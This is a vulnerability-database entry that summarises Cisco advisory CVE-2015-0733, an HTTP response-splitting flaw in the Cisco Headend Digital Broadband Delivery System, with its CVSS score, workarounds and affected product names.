Vulnslist

Cisco vulnerabilities by product, model, software, and advisory.

Cisco Headend Digital Broadband Delivery System HTTP Response-Splitting Vulnerability

Cisco-SA-20150529-CVE-2015-0733 · Medium · Published · Updated

A vulnerability in the Cisco Headend Digital Broadband Delivery System could allow an unauthenticated, remote attacker to conduct HTTP response-splitting attacks.   The vulnerability is due to improper sanitization on user input performed by the HTTP Header Handler within the affected software while handling HTTP requests. An attacker could exploit this vulnerability by convincing a user to follow a malicious HTTP URL with crafted carriage return-line feed (CRLF) characters. When processed, such characters could allow the attacker to execute arbitrary script code in the browser in the security context of the affected site or to generate crafted responses for the user. This may allow the attacker to conduct further attacks on the targeted system. Cisco has confirmed the vulnerability; however, software updates are not available. To exploit the vulnerability, the attacker may provide a link that directs a user to a malicious site and use misleading language or instructions to persuade the user to follow the provided link.

Cisco advisory · CSAF JSON

Workarounds

Administrators are advised to contact the vendor regarding future updates and releases.

Users are advised not to open email messages from suspicious or unrecognized sources. If users cannot verify that links or attachments included in email messages are safe, they are advised not to open them.

Administrators are advised to monitor affected systems.

CVEsCVE-2015-0733
Cisco Bug IDsCSCur25580
CVSS ScoreBase 4.3
Base 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N/E:H/RL:U/RC:C
Product Names From Source
Cisco Headend System Releases, Headend System Releases

Related Products

Product CVE Evidence
Headend System Releases CVE-2015-0733 Cisco OpenVuln
Headend Digital Broadband Delivery System CVE-2015-0733 Cisco OpenVuln
Cisco Headend System Releases CVE-2015-0733 Cisco OpenVuln
Cisco Headend Digital Broadband Delivery System CVE-2015-0733 Cisco OpenVuln